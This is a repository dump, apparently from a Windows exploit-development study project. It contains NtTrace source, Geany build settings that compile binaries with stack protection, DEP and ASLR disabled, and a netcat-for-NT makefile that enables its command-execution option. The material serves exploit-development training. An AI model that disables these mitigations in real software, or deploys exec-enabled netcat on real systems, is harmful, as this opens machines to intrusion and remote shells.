pGetProcessImageFileName(hProcess, szBuff, bufLen); 177 | } 178 | } 179 | } 180 | if (ret == 0) 181 | { /* report the first failure, not whichever fallback failed last */ 182 | SetLastError(lastError); 183 | } 184 | } 185 | if ( ret != 0 ) 186 | { /* NOTE(review): memcmp() reads 4 bytes of szBuff even when ret < 4; fine for the MAX_PATH buffer GetModuleBase() passes, but a caller with bufLen < 4 would over-read — a `ret >= 4 &&` guard would make this independent of the caller. */ 187 | if ( memcmp( szBuff, "\\??\\", 4 ) == 0 ) 188 | { 
189 | szBuff[1] = '\\'; /* For some reason the wrong UNC header is returned: turn the NT object-manager prefix "\??\" into the Win32 extended-length prefix "\\?\" so the path is usable by Win32 file APIs */ 190 | } 191 | } 192 | return ret; 193 | } 194 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/version.rc: -------------------------------------------------------------------------------- 1 | // Resource file for include for project binaries 2 | // 3 | // $Id: version.rc 613 2010-03-09 23:59:36Z Roger $ 4 | 5 | #include "winver.h" 6 | 7 | // Common values for the product suite 8 | #define MAJOR_VERSION 2 9 | #include "buildVersion.h" 10 | 11 | 12 | #ifndef MINOR_VERSION 13 | #error MINOR_VERSION must be defined. 14 | #endif 15 | 16 | #define STR(X) #X 17 | #define TO_STR(X) STR(X) 18 | 19 | #define VERSION MAJOR_VERSION,1,MINOR_VERSION,BUILD_VERSION 20 | #define VERSION_STRING TO_STR(MAJOR_VERSION) ".1." TO_STR(MINOR_VERSION) "." TO_STR(BUILD_VERSION) 21 | 22 | VS_VERSION_INFO VERSIONINFO 23 | FILEVERSION VERSION 24 | PRODUCTVERSION VERSION 25 | FILEFLAGSMASK 0x3fL 26 | FILEFLAGS 0x0L 27 | FILEOS VOS_NT_WINDOWS32 28 | #if defined(APPLICATION) 29 | FILETYPE VFT_APP 30 | #elif defined(LIBRARY) 31 | FILETYPE VFT_DLL 32 | #else 33 | #error APPLICATION or LIBRARY must be defined. 
34 | #endif 35 | FILESUBTYPE VFT2_UNKNOWN 36 | BEGIN 37 | BLOCK "StringFileInfo" 38 | BEGIN 39 | BLOCK "080904B0" 40 | BEGIN 41 | VALUE "CompanyName", "OR/2 Limited" 42 | VALUE "FileDescription", DESCRIPTION 43 | VALUE "FileVersion", VERSION_STRING 44 | VALUE "LegalCopyright", "Copyright (C) OR/2 Limited 2010" 45 | VALUE "ProductName", "Debugging Tools" 46 | END 47 | END 48 | BLOCK "VarFileInfo" 49 | BEGIN 50 | // UK English, Unicode 51 | VALUE "Translation", 0x809, 1200 52 | END 53 | END 54 | -------------------------------------------------------------------------------- /11_tools/PEフォーマット_nx_aslr有無の違い.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/PEフォーマット_nx_aslr有無の違い.JPG -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/filedefs/filetypes.README: -------------------------------------------------------------------------------- 1 | Copy files from C:\Program Files (x86)\Geany\data to this directory to overwrite them. To use the defaults, just delete the file in this directory. 2 | For more information read the documentation (in C:\Program Files (x86)\Geany\doc\index.html or visit http://www.geany.org/). 
-------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/filedefs/filetypes.c: -------------------------------------------------------------------------------- 1 | 2 | [build-menu] 3 | FT_00_LB=コンパイル・リンク 4 | FT_00_CM=cl /Od /GS- %f /link /nxcompat /dynamicbase 5 | FT_00_WD= 6 | EX_01_LB=デバッグ実行 7 | EX_01_CM=windbg %e.exe 8 | EX_01_WD= 9 | EX_00_LB=実行 10 | EX_00_CM=%e.exe 11 | EX_00_WD= 12 | FT_01_LB=コンパイル・リンク(DEP・ASLR無効) 13 | FT_01_CM=cl /Od /GS- /Zi %f /link /nxcompat:no /dynamicbase:no 14 | FT_01_WD= 15 | FT_02_LB=コンパイル 16 | FT_02_CM=cl /c /Zi /Od /GS- %f 17 | FT_02_WD= 18 | -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/filedefs/filetypes.common: -------------------------------------------------------------------------------- 1 | 2 | [build-menu] 3 | FT_00_LB=アセンブル 4 | FT_00_CM=nasm %f 5 | FT_00_WD= 6 | FT_01_LB=逆アセンブル 7 | FT_01_CM=ndisasm -b32 %e 8 | FT_01_WD= 9 | -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/filedefs/filetypes.python: -------------------------------------------------------------------------------- 1 | 2 | [build-menu] 3 | EX_00_LB=実行 4 | EX_00_CM=python "%f" 5 | EX_00_WD= 6 | -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/geany.conf: -------------------------------------------------------------------------------- 1 | 2 | [geany] 3 | default_open_path= 4 | cmdline_new_files=true 5 | notebook_double_click_hides_widgets=false 6 | tab_pos_sidebar=2 7 | sidebar_pos=0 8 | highlighting_invert_all=false 9 | pref_main_suppress_search_dialogs=false 10 | pref_main_search_use_current_word=true 11 | check_detect_indent=false 12 | use_tab_to_indent=true 13 | pref_editor_tab_width=4 14 | indent_mode=2 15 | indent_type=1 16 | virtualspace=1 17 | autocomplete_doc_words=false 18 | 
completion_drops_rest_of_word=false 19 | autocompletion_max_entries=30 20 | color_scheme= 21 | mru_length=10 22 | disk_check_timeout=30 23 | show_editor_scrollbars=true 24 | brace_match_ltgt=false 25 | use_gtk_word_boundaries=true 26 | complete_snippets_whilst_editing=false 27 | use_safe_file_saving=false 28 | gio_unsafe_save_backup=false 29 | indent_hard_tab_width=8 30 | find_selection_type=0 31 | show_symbol_list_expanders=true 32 | compiler_tab_autoscroll=true 33 | allow_always_save=false 34 | statusbar_template= 35 | new_document_after_close=false 36 | documents_show_paths=true 37 | sidebar_page=0 38 | pref_main_load_session=false 39 | pref_main_project_session=true 40 | pref_main_project_file_in_basedir=false 41 | pref_main_save_winpos=true 42 | pref_main_confirm_exit=false 43 | pref_main_suppress_status_messages=false 44 | switch_msgwin_pages=false 45 | beep_on_errors=true 46 | auto_focus=false 47 | sidebar_symbol_visible=true 48 | sidebar_openfiles_visible=true 49 | editor_font=Monospace 10 50 | tagbar_font=Sans 9 51 | msgwin_font=Sans 9 52 | show_notebook_tabs=true 53 | show_tab_cross=true 54 | tab_order_ltr=true 55 | tab_order_beside=false 56 | tab_pos_editor=2 57 | tab_pos_msgwin=0 58 | msgwin_status_visible=true 59 | msgwin_compiler_visible=true 60 | msgwin_messages_visible=true 61 | msgwin_scribble_visible=true 62 | use_native_windows_dialogs=false 63 | show_indent_guide=false 64 | show_white_space=false 65 | show_line_endings=false 66 | show_markers_margin=true 67 | show_linenumber_margin=true 68 | long_line_enabled=true 69 | long_line_type=0 70 | long_line_column=72 71 | long_line_color=#C2EBC2 72 | symbolcompletion_max_height=10 73 | symbolcompletion_min_chars=4 74 | use_folding=true 75 | unfold_all_children=false 76 | use_indicators=true 77 | line_wrapping=false 78 | auto_close_xml_tags=true 79 | complete_snippets=true 80 | auto_complete_symbols=true 81 | pref_editor_disable_dnd=false 82 | pref_editor_smart_home_key=true 83 | 
pref_editor_newline_strip=false 84 | line_break_column=72 85 | auto_continue_multiline=true 86 | comment_toggle_mark=~ 87 | scroll_stop_at_last_line=true 88 | autoclose_chars=0 89 | pref_editor_default_new_encoding=SHIFT_JIS 90 | pref_editor_default_open_encoding=None 91 | default_eol_character=0 92 | pref_editor_new_line=true 93 | pref_editor_ensure_convert_line_endings=false 94 | pref_editor_replace_tabs=false 95 | pref_editor_trail_space=false 96 | pref_toolbar_show=true 97 | pref_toolbar_append_to_menu=false 98 | pref_toolbar_use_gtk_default_style=true 99 | pref_toolbar_use_gtk_default_icon=true 100 | pref_toolbar_icon_style=0 101 | pref_toolbar_icon_size=0 102 | pref_template_developer=Hideaki 103 | pref_template_company= 104 | pref_template_mail=Hideaki@HIDEAKI-PC 105 | pref_template_initial=H 106 | pref_template_version=1.0 107 | pref_template_year=%Y 108 | pref_template_date=%Y-%m-%d 109 | pref_template_datetime=%d.%m.%Y %H:%M:%S %Z 110 | context_action_cmd= 111 | sidebar_visible=true 112 | statusbar_visible=true 113 | msgwindow_visible=true 114 | fullscreen=false 115 | scribble_text=メモとして、ここには自由に入力できます。 116 | scribble_pos=20 117 | treeview_position=298 118 | msgwindow_position=437 119 | geometry=-8;-8;1366;716;1; 120 | custom_date_format= 121 | tab_close_switch_to_mru=false 122 | msgwin_orientation=1 123 | detect_indent_width=false 124 | autocompletion_update_freq=250 125 | use_atomic_file_saving=false 126 | use_gio_unsafe_file_saving=true 127 | keep_edit_history_on_reload=true 128 | show_keep_edit_history_on_reload_msg=false 129 | extract_filetype_regex=-\\*-\\s*([^\\s]+)\\s*-\\*- 130 | replace_and_find_by_default=true 131 | 132 | [search] 133 | pref_search_current_file_dir=true 134 | find_all_expanded=false 135 | replace_all_expanded=false 136 | position_find_x=608 137 | position_find_y=407 138 | position_replace_x=-1 139 | position_replace_y=-1 140 | position_fif_x=-1 141 | position_fif_y=-1 142 | fif_regexp=false 143 | fif_case_sensitive=true 144 | 
fif_match_whole_word=false 145 | fif_invert_results=false 146 | fif_recursive=false 147 | fif_extra_options= 148 | fif_use_extra_options=false 149 | fif_files= 150 | fif_use_files=false 151 | pref_search_hide_find_dialog=false 152 | pref_search_always_wrap=false 153 | fif_files_mode=0 154 | find_regexp=true 155 | find_regexp_multiline=false 156 | find_case_sensitive=false 157 | find_escape_sequences=false 158 | find_match_whole_word=false 159 | find_match_word_start=false 160 | find_close_dialog=true 161 | replace_regexp=false 162 | replace_regexp_multiline=false 163 | replace_case_sensitive=false 164 | replace_escape_sequences=false 165 | replace_match_whole_word=false 166 | replace_match_word_start=false 167 | replace_search_backwards=false 168 | replace_close_dialog=true 169 | 170 | [plugins] 171 | load_plugins=true 172 | custom_plugin_path= 173 | active_plugins=; 174 | 175 | [tools] 176 | term_cmd=cmd.exe 177 | browser_cmd=firefox 178 | grep_cmd=grep 179 | terminal_cmd=cmd.exe /Q /C %c 180 | 181 | [printing] 182 | print_cmd=' 183 | use_gtk_printing=true 184 | print_line_numbers=true 185 | print_page_numbers=true 186 | print_page_header=true 187 | page_header_basename=false 188 | page_header_datefmt=%c 189 | 190 | [project] 191 | session_file= 192 | project_file_path=C:\\Users\\Hideaki\\プロジェクト 193 | 194 | [files] 195 | 
recent_files=C:\\Users\\Hideaki\\AppData\\Roaming\\geany\\filedefs\\filetypes.c;C:\\Users\\Hideaki\\AppData\\Roaming\\geany\\geany.conf;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\03_bufferoverflow\\Exploit_FileDump.py;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\02_bufferoverflow\\Exploit_CheckPass2.py;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\07_webserver\\Exploit_SimpleServer.py;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\07_webserver\\Test_SimpleServer.py;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\07_webserver\\SimpleServer.c;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\01_bufferoverflow\\CheckPass1.c;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\01_bufferoverflow\\Test_CheckPass1.py;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\02_bufferoverflow\\Test_CheckPass2.py; 196 | recent_projects= 197 | current_page=0 198 | FILE_NAME_0=359;C;0;EUTF-8;1;1;0;C%3A%5CUsers%5CHideaki%5CAppData%5CRoaming%5Cgeany%5Cfiledefs%5Cfiletypes.c;0;4 199 | 200 | [build-menu] 201 | number_ft_menu_items=0 202 | number_non_ft_menu_items=0 203 | number_exec_menu_items=0 204 | NF_00_LB=メイク(_M) 205 | NF_00_CM=make 206 | NF_00_WD= 207 | NF_03_LB=リンク(DEP・ASLR無効) 208 | NF_03_CM=link %e.obj /link /nxcompat:no /dynamicbase:no wsock32.lib User32.lib 209 | NF_03_WD= 210 | -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/keybindings.conf: -------------------------------------------------------------------------------- 1 | [Bindings] 2 | popup_gototagdefinition= 3 | edit_transposeline=t 4 | edit_movelineup= 5 | edit_movelinedown= 6 | move_tableft=Page_Up 7 | move_tabright=Page_Down 8 | -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/templates/templates.README: -------------------------------------------------------------------------------- 1 | There are several 
template files in this directory. For these templates you can use wildcards. 2 | For more information read the documentation (in C:\Program Files (x86)\Geany\doc\index.html or visit http://www.geany.org/). -------------------------------------------------------------------------------- /11_tools/mona/mona-py-the-manual.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/mona/mona-py-the-manual.pdf -------------------------------------------------------------------------------- /11_tools/mona/mona_compare/mona_compare.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/mona/mona_compare/mona_compare.txt -------------------------------------------------------------------------------- /11_tools/mona/mona_compare/シェルコード比較.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/mona/mona_compare/シェルコード比較.JPG -------------------------------------------------------------------------------- /11_tools/mona/mona保存先設定/mona保存先設定_管理者権限が必要.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/mona/mona保存先設定/mona保存先設定_管理者権限が必要.txt -------------------------------------------------------------------------------- /11_tools/mona/mona保存先設定/mona設定ファイル.JPG: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/mona/mona保存先設定/mona設定ファイル.JPG -------------------------------------------------------------------------------- /11_tools/nc111nt/generic.h: -------------------------------------------------------------------------------- 1 | /* generic.h -- anything you don't #undef at the end remains in effect. 2 | The ONLY things that go in here are generic indicator flags; it's up 3 | to your programs to declare and call things based on those flags. 4 | 5 | You should only need to make changes via a minimal system-specific section 6 | at the end of this file. To build a new section, rip through this and 7 | check everything it mentions on your platform, and #undef that which needs 8 | it. If you generate a system-specific section you didn't find in here, 9 | please mail me a copy so I can update the "master". 10 | 11 | I realize I'm probably inventing another pseudo-standard here, but 12 | goddamnit, everybody ELSE has already, and I can't include all of their 13 | hairball schemes too. HAVE_xx conforms to the gnu/autoconf usage and 14 | seems to be the most common format. In fact, I dug a lot of these out 15 | of autoconf and tried to common them all together using "stupidh" to 16 | collect data from platforms. 17 | 18 | In disgust... _H* 940910, 941115. Pseudo-version: 1.1 */ 19 | 20 | #ifndef GENERIC_H /* only run through this once */ 21 | #define GENERIC_H 22 | 23 | /* =============================== */ 24 | /* System calls, lib routines, etc */ 25 | /* =============================== */ 26 | 27 | /* How does your system declare malloc, void or char? Usually void, but go 28 | ask the SunOS people why they had to be different... */ 29 | #define VOID_MALLOC 30 | 31 | /* notably from fwtk/firewall.h: posix locking? */ 32 | #define HAVE_FLOCK /* otherwise it's lockf() */ 33 | 34 | /* if you don't have setsid(), you might have setpgrp(). 
35 | #define HAVE_SETSID 36 | 37 | /* random() is generally considered better than rand() */ 38 | /* xxx: rand48? */ 39 | #define HAVE_RANDOM 40 | 41 | /* if your machine doesn't have lstat(), it should have stat() [dos...] */ 42 | #define HAVE_LSTAT 43 | 44 | /* different kinds of term ioctls. How to recognize them, very roughly: 45 | sysv/POSIX_ME_HARDER: termio[s].h, struct termio[s], tty.c_*[] 46 | bsd/old stuff: sgtty.h, ioctl(TIOCSETP), sgttyb.sg_*, tchars.t_* 47 | #define HAVE_TERMIOS 48 | 49 | /* dbm vs ndbm */ 50 | #define HAVE_NDBM 51 | 52 | /* extended utmp/wtmp stuff. MOST machines still do NOT have this SV-ism */ 53 | #define UTMPX 54 | 55 | /* some systems have nice() which takes *relative* values... [resource.h] */ 56 | #define HAVE_SETPRIORITY 57 | 58 | /* a sysvism, I think, but ... */ 59 | #define HAVE_SYSINFO 60 | 61 | /* punted for now: setown / siocspgrp ... see firewall.h */ 62 | 63 | /* ============= */ 64 | /* Include files */ 65 | /* ============= */ 66 | 67 | /* Presence of these can be determined via a script that sniffs them 68 | out if you aren't sure. */ 69 | 70 | /* stdlib comes with most modern compilers, but ya never know */ 71 | #define HAVE_STDLIB_H 72 | 73 | /* not on a DOS box! */ 74 | #define HAVE_UNISTD_H 75 | 76 | /* stdarg is a weird one */ 77 | #define HAVE_STDARG_H 78 | 79 | /* dir.h or maybe ndir.h otherwise. */ 80 | #define HAVE_DIRENT_H 81 | 82 | /* string or strings */ 83 | #define HAVE_STRINGS_H 84 | 85 | /* if you don't have lastlog.h, what you want might be in login.h */ 86 | #define HAVE_LASTLOG_H 87 | 88 | /* predefines for _PATH_various */ 89 | #define HAVE_PATHS_H 90 | 91 | /* assorted others */ 92 | #define HAVE_PARAM_H 93 | #define HAVE_SYSMACROS_H /* in sys/! */ 94 | #define HAVE_TTYENT_H /* securetty et al */ 95 | 96 | /* ==================== */ 97 | 98 | /* Still maybe have to do something about the following, if it's even 99 | worth it. 
I just grepped a lot of these out of various code, without 100 | looking them up yet: 101 | 102 | #define HAVE_EINPROGRESS 103 | #define HAVE_F_SETOWN 104 | #define HAVE_SETENV ... now *there's* a hairy one; **environ is portable 105 | #define BIG_ENDIAN/little_endian ... *please* try to avoid this stupidity 106 | #define HAVE_GETUSERSHELL ... you could always pull it out of getpwent() 107 | #define HAVE_SETE[UG]ID ... lib or syscall, it varies on diff platforms 108 | #define HAVE_STRCHR ... should actually be handled by string/strings 109 | #define HAVE_PSTAT 110 | #define HAVE_ST_BLKSIZE ... a stat() thing? 111 | #define HAVE_IP_TOS 112 | #define HAVE_STRFTIME ... screw this, we should just INCLUDE one for lame 113 | old boxes that don't have it [sunos 3.x, early 4.x?] 114 | #define HAVE_VFPRINTF 115 | #define HAVE_SHADOW_PASSWD ... in its multitudinous schemes?? ... how 116 | about sumpin' like #define SHADOW_PASSWD_TYPE ... could get grody. 117 | #define SIG* ... what a swamp, punt for now; should all be in signal.h 118 | #define HAVE_STRCSPN ... see larry wall's comment in the fwtk regex code 119 | #define ULTRIX_AUTH ... bwahaha. 120 | #define HAVE_YP or NIS or whatever you wanna call it this week 121 | randomness about VARARGS?? 122 | 123 | There's also the issue about WHERE various .h files live, sys/ or otherwise. 124 | There's a BIG swamp lurking where network code of any sort lives. 125 | 126 | */ 127 | 128 | /* ======================== */ 129 | /* System-specific sections */ 130 | /* ======================== */ 131 | 132 | /* By turning OFF various bits of the above, you can customize for 133 | a given platform. /* 134 | 135 | /* DOS boxes, with MSC; you may need to adapt to a different compiler. 
*/ 136 | #ifdef MSDOS 137 | #undef HAVE_FLOCK 138 | #undef HAVE_RANDOM 139 | #undef HAVE_LSTAT 140 | #undef HAVE_TERMIOS 141 | #undef UTMPX 142 | #undef HAVE_SYSINFO 143 | #undef HAVE_UNISTD_H 144 | #undef HAVE_DIRENT_H /* unless you have the k00l little wrapper from L5!! */ 145 | #undef HAVE_STRINGS_H 146 | #undef HAVE_LASTLOG_H 147 | #undef HAVE_PATHS_H 148 | #undef HAVE_PARAM_H 149 | #undef HAVE_SYSMACROS_H 150 | #undef HAVE_TTYENT_H 151 | #endif /* MSDOS */ 152 | 153 | /* buglix 4.x; dunno about 3.x on down. should be bsd4.2. */ 154 | #ifdef ULTRIX 155 | #undef UTMPX 156 | #undef HAVE_PATHS_H 157 | #undef HAVE_SYSMACROS_H 158 | #endif /* buglix */ 159 | 160 | /* some of this might still be broken on older sunoses */ 161 | #ifdef SUNOS 162 | #undef VOID_MALLOC 163 | #undef UTMPX 164 | #undef HAVE_PATHS_H 165 | #endif /* sunos */ 166 | 167 | /* "contact your vendor for a fix" */ 168 | #ifdef SOLARIS 169 | /* has UTMPX */ 170 | #undef HAVE_SETPRIORITY 171 | #undef HAVE_STRINGS_H /* this is genuinely the case, go figure */ 172 | #undef HAVE_PATHS_H 173 | #undef HAVE_TTYENT_H 174 | #endif /* SOLARIS */ 175 | 176 | /* whatever aix variant MIT had at the time */ 177 | #ifdef AIX 178 | #undef UTMPX 179 | #undef HAVE_LASTLOG_H 180 | #define HAVE_LOGIN_H /* "special", in the educational sense */ 181 | #endif /* aix */ 182 | 183 | /* linux, which is trying as desperately as the gnu folks can to be 184 | POSIXLY_CORRECT. I think I'm gonna hurl... */ 185 | #ifdef LINUX 186 | #undef UTMPX 187 | #undef HAVE_SYSINFO 188 | #undef HAVE_TTYENT_H 189 | #endif /* linux */ 190 | 191 | /* irix 5.x; may not be correct for earlier ones */ 192 | #ifdef IRIX 193 | /* wow, does irix really have everything?! */ 194 | #endif /* irix */ 195 | 196 | /* osf on alphas */ 197 | #ifdef OSF 198 | #undef UTMPX 199 | #endif /* osf */ 200 | 201 | /* they's some FUCKED UP paths in this one! 
*/ 202 | #ifdef FREEBSD 203 | #undef UTMPX 204 | #undef HAVE_SYSINFO 205 | #undef HAVE_LASTLOG_H 206 | #undef HAVE_SYSMACROS_H 207 | #endif /* freebsd */ 208 | 209 | /* From the sidewinder site, of all places; may be unreliable */ 210 | #ifdef BSDI 211 | #undef UTMPX 212 | #undef HAVE_LASTLOG_H 213 | #undef HAVE_SYSMACROS_H 214 | #undef HAVE_TTYENT_H 215 | /* and their malloc.h was in sys/ ?! */ 216 | #endif /* bsdi */ 217 | 218 | /* netbsd/44lite, jives with amiga-netbsd from cactus */ 219 | #ifdef NETBSD 220 | #undef UTMPX 221 | #undef HAVE_SYSINFO 222 | #undef HAVE_LASTLOG_H 223 | #endif /* netbsd */ 224 | 225 | /* Make some "generic" assumptions if all else fails */ 226 | #ifdef GENERIC 227 | #undef HAVE_FLOCK 228 | #if defined(SYSV) && (SYSV < 4) /* TW leftover: old SV doesnt have symlinks */ 229 | #undef HAVE_LSTAT 230 | #endif /* old SYSV */ 231 | #undef HAVE_TERMIOS 232 | #undef UTMPX 233 | #undef HAVE_PATHS_H 234 | #endif /* generic */ 235 | 236 | /* ================ */ 237 | #endif /* GENERIC_H */ 238 | -------------------------------------------------------------------------------- /11_tools/nc111nt/getopt.h: -------------------------------------------------------------------------------- 1 | /* Declarations for getopt. 2 | Copyright (C) 1989, 90, 91, 92, 93, 94 Free Software Foundation, Inc. 3 | 4 | This file is part of the GNU C Library. Its master source is NOT part of 5 | the C library, however. The master source lives in /gd/gnu/lib. 6 | 7 | The GNU C Library is free software; you can redistribute it and/or 8 | modify it under the terms of the GNU Library General Public License as 9 | published by the Free Software Foundation; either version 2 of the 10 | License, or (at your option) any later version. 11 | 12 | The GNU C Library is distributed in the hope that it will be useful, 13 | but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU 15 | Library General Public License for more details. 16 | 17 | You should have received a copy of the GNU Library General Public 18 | License along with the GNU C Library; see the file COPYING.LIB. If 19 | not, write to the Free Software Foundation, Inc., 675 Mass Ave, 20 | Cambridge, MA 02139, USA. */ 21 | 22 | #ifndef _GETOPT_H 23 | #define _GETOPT_H 1 24 | 25 | #ifdef __cplusplus 26 | extern "C" { 27 | #endif 28 | 29 | /* For communication from `getopt' to the caller. 30 | When `getopt' finds an option that takes an argument, 31 | the argument value is returned here. 32 | Also, when `ordering' is RETURN_IN_ORDER, 33 | each non-option ARGV-element is returned here. */ 34 | 35 | extern char *optarg; 36 | 37 | /* Index in ARGV of the next element to be scanned. 38 | This is used for communication to and from the caller 39 | and for communication between successive calls to `getopt'. 40 | 41 | On entry to `getopt', zero means this is the first call; initialize. 42 | 43 | When `getopt' returns EOF, this is the index of the first of the 44 | non-option elements that the caller should itself scan. 45 | 46 | Otherwise, `optind' communicates from one call to the next 47 | how much of ARGV has been scanned so far. */ 48 | 49 | extern int optind; 50 | 51 | /* Callers store zero here to inhibit the error message `getopt' prints 52 | for unrecognized options. */ 53 | 54 | extern int opterr; 55 | 56 | /* Set to an option character which was unrecognized. */ 57 | 58 | extern int optopt; 59 | 60 | /* Describe the long-named options requested by the application. 61 | The LONG_OPTIONS argument to getopt_long or getopt_long_only is a vector 62 | of `struct option' terminated by an element containing a name which is 63 | zero. 64 | 65 | The field `has_arg' is: 66 | no_argument (or 0) if the option does not take an argument, 67 | required_argument (or 1) if the option requires an argument, 68 | optional_argument (or 2) if the option takes an optional argument. 
69 | 70 | If the field `flag' is not NULL, it points to a variable that is set 71 | to the value given in the field `val' when the option is found, but 72 | left unchanged if the option is not found. 73 | 74 | To have a long-named option do something other than set an `int' to 75 | a compiled-in constant, such as set a value from `optarg', set the 76 | option's `flag' field to zero and its `val' field to a nonzero 77 | value (the equivalent single-letter option character, if there is 78 | one). For long options that have a zero `flag' field, `getopt' 79 | returns the contents of the `val' field. */ 80 | 81 | struct option 82 | { 83 | #if defined (__STDC__) && __STDC__ 84 | const char *name; 85 | #else 86 | char *name; 87 | #endif 88 | /* has_arg can't be an enum because some compilers complain about 89 | type mismatches in all the code that assumes it is an int. */ 90 | int has_arg; 91 | int *flag; 92 | int val; 93 | }; 94 | 95 | /* Names for the values of the `has_arg' field of `struct option'. */ 96 | 97 | #define no_argument 0 98 | #define required_argument 1 99 | #define optional_argument 2 100 | 101 | #if defined (__STDC__) && __STDC__ 102 | #ifdef __GNU_LIBRARY__ 103 | /* Many other libraries have conflicting prototypes for getopt, with 104 | differences in the consts, in stdlib.h. To avoid compilation 105 | errors, only prototype getopt for the GNU C library. */ 106 | extern int getopt (int argc, char *const *argv, const char *shortopts); 107 | #else /* not __GNU_LIBRARY__ */ 108 | extern int getopt (); 109 | #endif /* __GNU_LIBRARY__ */ 110 | extern int getopt_long (int argc, char *const *argv, const char *shortopts, 111 | const struct option *longopts, int *longind); 112 | extern int getopt_long_only (int argc, char *const *argv, 113 | const char *shortopts, 114 | const struct option *longopts, int *longind); 115 | 116 | /* Internal only. Users should not call this directly. 
*/ 117 | extern int _getopt_internal (int argc, char *const *argv, 118 | const char *shortopts, 119 | const struct option *longopts, int *longind, 120 | int long_only); 121 | #else /* not __STDC__ */ 122 | extern int getopt (); 123 | extern int getopt_long (); 124 | extern int getopt_long_only (); 125 | 126 | extern int _getopt_internal (); 127 | #endif /* __STDC__ */ 128 | 129 | #ifdef __cplusplus 130 | } 131 | #endif 132 | 133 | #endif /* _GETOPT_H */ 134 | -------------------------------------------------------------------------------- /11_tools/nc111nt/makefile: -------------------------------------------------------------------------------- 1 | 2 | cc=cl 3 | link=link 4 | 5 | cflags=/nologo /ML /W3 /GX /O2 /D "NDEBUG" /D "WIN32" /D "_CONSOLE" /D "TELNET" /D "GAPING_SECURITY_HOLE" /YX /FD /c 6 | lflags=kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe 7 | 8 | all: nc.exe 9 | 10 | getopt.obj: getopt.c 11 | $(cc) $(cflags) getopt.c 12 | 13 | doexec.obj: doexec.c 14 | $(cc) $(cflags) doexec.c 15 | 16 | netcat.obj: netcat.c 17 | $(cc) $(cflags) netcat.c 18 | 19 | 20 | nc.exe: getopt.obj doexec.obj netcat.obj 21 | $(link) getopt.obj doexec.obj netcat.obj $(lflags) 22 | -------------------------------------------------------------------------------- /11_tools/nc111nt/nc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/nc111nt/nc.exe -------------------------------------------------------------------------------- /11_tools/nc111nt/readme.txt: -------------------------------------------------------------------------------- 1 | 2 | UPDATE 12/27/04 security fix in -e option for Windows 3 | 4 | Netcat 1.11 for NT - nc111nt.zip 5 | 6 | The original version of Netcat was written by *hobbit* 7 | The NT version was done by Weld Pond 8 | 9 | Netcat for NT 
is the tcp/ip "Swiss Army knife" that never made it into any 10 | of the resource kits. It has proved to be an extremely versatile tool on 11 | the unix platform. So why should NT always be unix's poor cousin when it 12 | comes to tcp/ip testing and exploration? I bet many NT admins out there 13 | keep a unix box around to use tools such as Netcat or to test their systems 14 | with the unix version of an NT vulnerability exploit. With Netcat for NT 15 | part of that feeling disempowerment is over. 16 | 17 | Included with this release is Hobbit's original description of the powers 18 | of Netcat. In this document I will briefly describe some of the things an 19 | NT admin might want to do and know about with Netcat on NT. For more 20 | detailed technical information please read hobbit.txt included in the 21 | nc11nt.zip archive. 22 | 23 | Basic Features 24 | 25 | * Outbound or inbound connections, TCP or UDP, to or from any ports 26 | * Full DNS forward/reverse checking, with appropriate warnings 27 | * Ability to use any local source port 28 | * Ability to use any locally-configured network source address 29 | * Built-in port-scanning capabilities, with randomizer 30 | * Can read command line arguments from standard input 31 | * Slow-send mode, one line every N seconds 32 | * Hex dump of transmitted and received data 33 | * Ability to let another program service established 34 | connections 35 | * Telnet-options responder 36 | 37 | New for NT 38 | 39 | * Ability to run in the background without a console window 40 | * Ability to restart as a single-threaded server to handle a new 41 | connection 42 | 43 | 44 | A simple example of using Netcat is to pull down a web page from a web 45 | server. With Netcat you get to see the full HTTP header so you can see 46 | which web server a particular site is running. 47 | 48 | Since NT has a rather anemic command processor, some of the things that are 49 | easy in unix may be a bit more clunky in NT. 
